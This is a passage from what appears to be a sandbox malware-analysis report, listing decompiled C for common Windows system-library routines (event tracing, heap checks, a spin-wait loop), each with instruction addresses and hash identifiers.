				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E0117165E(__ebx, 0x1198ae4, (__edx -  *0x1198b04 >> 0x14) + (__edx -  *0x1198b04 >> 0x14), __edi, __ecx, (__edx -  *0x1198b04 >> 0x14) + (__edx -  *0x1198b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E0116AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E010C7D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E0115FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}











                                          0x01171074
                                          0x01171080
                                          0x01171082
                                          0x0117108a
                                          0x0117108f
                                          0x01171093
                                          0x011710ab
                                          0x011710ab
                                          0x011710c3
                                          0x011710cf
                                          0x011710e1
                                          0x011710d1
                                          0x011710da
                                          0x011710da
                                          0x011710e9
                                          0x011710f5
                                          0x011710f5
                                          0x011710fe

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3f1d030709f5a25b4b0dec24b7200c8a88163b8f12a0d7c4944e9047a11a4c30
                                          • Instruction ID: 73e9c95109f7f1af3870d3d13f8375f61cc0fc7947793baff371f0264774f471
                                          • Opcode Fuzzy Hash: 3f1d030709f5a25b4b0dec24b7200c8a88163b8f12a0d7c4944e9047a11a4c30
                                          • Instruction Fuzzy Hash: D3012872604746ABC719EF28C900B1A7BE9BB84214F048529F99693390DF30D455CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0115FE3F Relevance: .0, Instructions: 46COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 59%
                                          			E0115FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x119d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E010EFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E010C7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E010EB640(E010E9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                          0x0115fe3f
                                          0x0115fe3f
                                          0x0115fe4e
                                          0x0115fe58
                                          0x0115fe5d
                                          0x0115fe5f
                                          0x0115fe6a
                                          0x0115fe72
                                          0x0115fe75
                                          0x0115fe78
                                          0x0115fe83
                                          0x0115fe95
                                          0x0115fe85
                                          0x0115fe8e
                                          0x0115fe8e
                                          0x0115fea0
                                          0x0115fea1
                                          0x0115fea3
                                          0x0115fea8
                                          0x0115febd

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 120a2ce8ef1c70a03395e802ff6b3e0b29fbf513ecac0e908e95f2368ccae166
                                          • Instruction ID: 953b9bdd059811747fd712f05d6a7e14c2d76b2bf3f2f975368e6434745192ce
                                          • Opcode Fuzzy Hash: 120a2ce8ef1c70a03395e802ff6b3e0b29fbf513ecac0e908e95f2368ccae166
                                          • Instruction Fuzzy Hash: 76018871A00219AFDB14DFA9D845FAEB7B8EF44700F054066B910DB281DA749941CB95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0115FEC0 Relevance: .0, Instructions: 46COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 59%
                                          			E0115FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x119d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E010EFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E010C7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E010EB640(E010E9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                          0x0115fec0
                                          0x0115fec0
                                          0x0115fecf
                                          0x0115fed9
                                          0x0115fede
                                          0x0115fee0
                                          0x0115feeb
                                          0x0115fef3
                                          0x0115fef6
                                          0x0115fef9
                                          0x0115ff04
                                          0x0115ff16
                                          0x0115ff06
                                          0x0115ff0f
                                          0x0115ff0f
                                          0x0115ff21
                                          0x0115ff22
                                          0x0115ff24
                                          0x0115ff29
                                          0x0115ff3e

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 41f10f917c4d716dae14919a65eec38ffa4d5565e1983bcebf251ee39030ce0f
                                          • Instruction ID: b5fc385969e9156891eb7f11c2a962840680206a479a7cb39efcc7a06035e910
                                          • Opcode Fuzzy Hash: 41f10f917c4d716dae14919a65eec38ffa4d5565e1983bcebf251ee39030ce0f
                                          • Instruction Fuzzy Hash: 6D018471A00209AFDB14DBA9D845FAEBBB8EF45700F444066B911EB280DA749A41CBD5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01178A62 Relevance: .0, Instructions: 44COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 54%
                                          			E01178A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x119d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E010C7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E010EB640(E010E9AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                          0x01178a62
                                          0x01178a71
                                          0x01178a79
                                          0x01178a82
                                          0x01178a85
                                          0x01178a89
                                          0x01178a8c
                                          0x01178a8f
                                          0x01178a92
                                          0x01178a95
                                          0x01178a9f
                                          0x01178ab1
                                          0x01178aa1
                                          0x01178aaa
                                          0x01178aaa
                                          0x01178abc
                                          0x01178abd
                                          0x01178abf
                                          0x01178ac4
                                          0x01178ada

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e2890037ccc5e2e9ac137e2554aca4420d29a5b125fabd85ed78b97a2d9fc9d9
                                          • Instruction ID: 8ccf130c6facb02b0b359be1b4079f9cf07b4c262c0e59bdf32254affd7ea705
                                          • Opcode Fuzzy Hash: e2890037ccc5e2e9ac137e2554aca4420d29a5b125fabd85ed78b97a2d9fc9d9
                                          • Instruction Fuzzy Hash: 22011AB1A00219AFCB04EFA9D9459EEBBB8EF58710F10405AF915E7341D634AA008BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01178ED6 Relevance: .0, Instructions: 44COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 54%
                                          			E01178ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x119d360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E010C7D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E010EB640(E010E9AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}


















                                          0x01178ed6
                                          0x01178ee5
                                          0x01178eed
                                          0x01178ef0
                                          0x01178efa
                                          0x01178f03
                                          0x01178f0c
                                          0x01178f15
                                          0x01178f24
                                          0x01178f27
                                          0x01178f31
                                          0x01178f43
                                          0x01178f33
                                          0x01178f3c
                                          0x01178f3c
                                          0x01178f4e
                                          0x01178f4f
                                          0x01178f51
                                          0x01178f56
                                          0x01178f69

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b65e75b2ea171af9e06cf7df500ec337918ec46258ff3fb56484857c51365904
                                          • Instruction ID: 312737ccad2afa5c0004712bdccaac49907f52d8eae576b022bbf34dd42b0cac
                                          • Opcode Fuzzy Hash: b65e75b2ea171af9e06cf7df500ec337918ec46258ff3fb56484857c51365904
                                          • Instruction Fuzzy Hash: 7E111EB0A0020A9FDB04DFA9D545BAEBBF4FF08300F0442AAE519EB381E6349940CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010ADB60 Relevance: .0, Instructions: 43COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E010ADB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E010ADB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E010AE7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L010AE8B0(__ecx, _t14, 0xfff);
							L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                                          0x010adb64
                                          0x010adb66
                                          0x010adb6b
                                          0x010adbaa
                                          0x010adb71
                                          0x010adb76
                                          0x010adb7a
                                          0x010adba3
                                          0x010adb7c
                                          0x010adb87
                                          0x010adb8b
                                          0x01104fa1
                                          0x01104fb3
                                          0x01104fb8
                                          0x010adb91
                                          0x010adb96
                                          0x010adb98
                                          0x010adb98
                                          0x010adb8b
                                          0x010adb7a
                                          0x010adb9d
                                          0x010adba2

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                          • Instruction ID: 7dd401604745b7dc61ee959e7bfe55b3f05886fa7a8e3087e10f7bdb1255a6f9
                                          • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                          • Instruction Fuzzy Hash: B8F0F633211623DBD3326AD988D4FAFBA959FD1AA0F560435F3859BB44CA608C0287E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010AB1E1 Relevance: .0, Instructions: 42COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E010AB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E010C7D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E010C7D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E01127016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                                          0x010ab1e8
                                          0x010ab1ea
                                          0x010ab1f3
                                          0x01104a17
                                          0x010ab1f9
                                          0x010ab1f9
                                          0x010ab1f9
                                          0x010ab201
                                          0x01104a21
                                          0x01104a2e
                                          0x00000000
                                          0x00000000
                                          0x01104a3b
                                          0x01104a4d
                                          0x01104a3d
                                          0x01104a46
                                          0x01104a46
                                          0x01104a55
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x010ab20a
                                          0x010ab20a
                                          0x010ab20a
                                          0x010ab20a

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                          • Instruction ID: b82122290957132c440aee3262738c7f0ee145da36063e21f0dea556b166d756
                                          • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                          • Instruction Fuzzy Hash: 9601F432600680DBD327A7ADC844F6A7BD8EF91754F0900A2FA558BAF2DBB8CC40C715
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0113FE87 Relevance: .0, Instructions: 38COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 46%
                                          			E0113FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x119d360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E010C7D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E010EB640(E010E9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}
















                                          0x0113fe96
                                          0x0113fe9e
                                          0x0113fea1
                                          0x0113fead
                                          0x0113feb3
                                          0x0113feb9
                                          0x0113fec3
                                          0x0113fed5
                                          0x0113fec5
                                          0x0113fece
                                          0x0113fece
                                          0x0113fee0
                                          0x0113fee1
                                          0x0113fee3
                                          0x0113fee8
                                          0x0113fefb

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9d8773d89eaf01ab815250627817a33cddc6a5b7c591081cab0809693dd9371f
                                          • Instruction ID: 110fe2479af78225bb04197306122edee44daff14d88536533aa4d17d629635b
                                          • Opcode Fuzzy Hash: 9d8773d89eaf01ab815250627817a33cddc6a5b7c591081cab0809693dd9371f
                                          • Instruction Fuzzy Hash: 81016270A00209AFCB14DFA8D546AAEB7F4FF08704F144169B555DB382D635DA02CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0116131B Relevance: .0, Instructions: 36COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 48%
                                          			E0116131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x119d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E010C7D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E010EB640(E010E9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                          0x0116131b
                                          0x0116132a
                                          0x01161330
                                          0x01161336
                                          0x0116133e
                                          0x01161341
                                          0x01161344
                                          0x0116134f
                                          0x01161361
                                          0x01161351
                                          0x0116135a
                                          0x0116135a
                                          0x0116136c
                                          0x0116136d
                                          0x0116136f
                                          0x01161374
                                          0x01161387

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dd68a16a619e632aa2dc7562130d9c2e0f44895121051de41ffef7b9cf3ce54a
                                          • Instruction ID: 67f41e012fb3be631370012dcf77261bef652cf4c5fa57d0ed09d3f464dba00f
                                          • Opcode Fuzzy Hash: dd68a16a619e632aa2dc7562130d9c2e0f44895121051de41ffef7b9cf3ce54a
                                          • Instruction Fuzzy Hash: 8C01AFB1A0420DAFCB04EFA9D505AAEB7F4FF48700F004069F855EB381E634DA00CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010D6B90 Relevance: .0, Instructions: 36COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 90%
                                          			E010D6B90(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _t11;
				signed int _t12;
				intOrPtr _t19;
				void* _t20;
				intOrPtr* _t21;

				_t21 = _a4;
				_t19 =  *_t21;
				if(_t19 != 0) {
					if(_t19 < 0x1fff) {
						_t19 = _t19 + _t19;
					}
					L3:
					 *_t21 = _t19;
					asm("rdtsc");
					_v8 = 0;
					_t12 = _t11 & _t19 - 0x00000001;
					_t20 = _t19 + _t12;
					if(_t20 == 0) {
						L5:
						return _t12;
					} else {
						goto L4;
					}
					do {
						L4:
						asm("pause");
						_t12 = _v8 + 1;
						_v8 = _t12;
					} while (_t12 < _t20);
					goto L5;
				}
				_t12 =  *( *[fs:0x18] + 0x30);
				if( *((intOrPtr*)(_t12 + 0x64)) == 1) {
					goto L5;
				}
				_t19 = 0x40;
				goto L3;
			}









                                          0x010d6b96
                                          0x010d6b99
                                          0x010d6b9d
                                          0x010d6be9
                                          0x010d6beb
                                          0x010d6beb
                                          0x010d6bb3
                                          0x010d6bb3
                                          0x010d6bb5
                                          0x010d6bba
                                          0x010d6bc1
                                          0x010d6bc3
                                          0x010d6bc5
                                          0x010d6be0
                                          0x010d6be0
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x010d6bc7
                                          0x010d6bc7
                                          0x010d6bd0
                                          0x010d6bd5
                                          0x010d6bd6
                                          0x010d6bd9
                                          0x00000000
                                          0x010d6bc7
                                          0x010d6ba5
                                          0x010d6bac
                                          0x00000000
                                          0x00000000
                                          0x010d6bae
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 81643371c3d383621713f4ac5897031efe5d79de90dbf9db909a2b6cb50fdbef
                                          • Instruction ID: a8cf2d03847447066c9721917c197ba6595ab80da75ce2ca0ebeaa3d9d21dff5
                                          • Opcode Fuzzy Hash: 81643371c3d383621713f4ac5897031efe5d79de90dbf9db909a2b6cb50fdbef
                                          • Instruction Fuzzy Hash: 7CF04975A00208DFDB58CE48C690AACBBB1EB44320F2440A8E5469B700D63A9E84DB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01178F6A Relevance: .0, Instructions: 36COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 48%
                                          			E01178F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x119d360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E010C7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E010EB640(E010E9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                          0x01178f6a
                                          0x01178f79
                                          0x01178f81
                                          0x01178f84
                                          0x01178f8b
                                          0x01178f91
                                          0x01178f94
                                          0x01178f9e
                                          0x01178fb0
                                          0x01178fa0
                                          0x01178fa9
                                          0x01178fa9
                                          0x01178fbb
                                          0x01178fbc
                                          0x01178fbe
                                          0x01178fc3
                                          0x01178fd6

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d1e17d5e9cd541b1d6a86153030c257643c6725e15b1859c4f48c7ecf7c8c314
                                          • Instruction ID: 070570c1d02648f53ecc13d975ace4ec5a1f7ef27003418b2d17f20143fbc66c
                                          • Opcode Fuzzy Hash: d1e17d5e9cd541b1d6a86153030c257643c6725e15b1859c4f48c7ecf7c8c314
                                          • Instruction Fuzzy Hash: 79013174A00209AFDB04EFB9D545AAEBBF4EF18300F504059B955EB380DA34DE00CB95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01161608 Relevance: .0, Instructions: 34COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 46%
                                          			E01161608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x119d360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E010C7D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E010EB640(E010E9AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}














                                          0x01161608
                                          0x01161617
                                          0x0116161d
                                          0x01161625
                                          0x01161628
                                          0x0116162b
                                          0x01161636
                                          0x01161648
                                          0x01161638
                                          0x01161641
                                          0x01161641
                                          0x01161653
                                          0x01161654
                                          0x01161656
                                          0x0116165b
                                          0x0116166e

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: edc71ec5ea262686339a6073e1d6799b20f3c3f83fd863424dbe208039f5fe7d
                                          • Instruction ID: 34958817c54bb284a760606644201f9f48141cbb40b06e148a13e54d02595105
                                          • Opcode Fuzzy Hash: edc71ec5ea262686339a6073e1d6799b20f3c3f83fd863424dbe208039f5fe7d
                                          • Instruction Fuzzy Hash: 15F0C2B1A01208EFCB04EFA9D405AAEB7F8EF18300F044069A911EB380E6349900CB84
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010CC577 Relevance: .0, Instructions: 33COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E010CC577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E010CC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x10811cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E011788F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                                          0x010cc577
                                          0x010cc57d
                                          0x010cc581
                                          0x010cc5b5
                                          0x010cc5b9
                                          0x010cc5ce
                                          0x010cc5ce
                                          0x010cc5ca
                                          0x00000000
                                          0x010cc5ca
                                          0x010cc5c4
                                          0x010cc5c8
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x010cc5ad
                                          0x00000000
                                          0x010cc5af

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ebe923dcf458736a9e9e62a47386e3d0320f1fb4fade190ff4019c8ef3ce1ebb
                                          • Instruction ID: cac60db73ab7beb5f704fa6dec9f531d344fd2ebac811d23bb03bf278fc0b108
                                          • Opcode Fuzzy Hash: ebe923dcf458736a9e9e62a47386e3d0320f1fb4fade190ff4019c8ef3ce1ebb
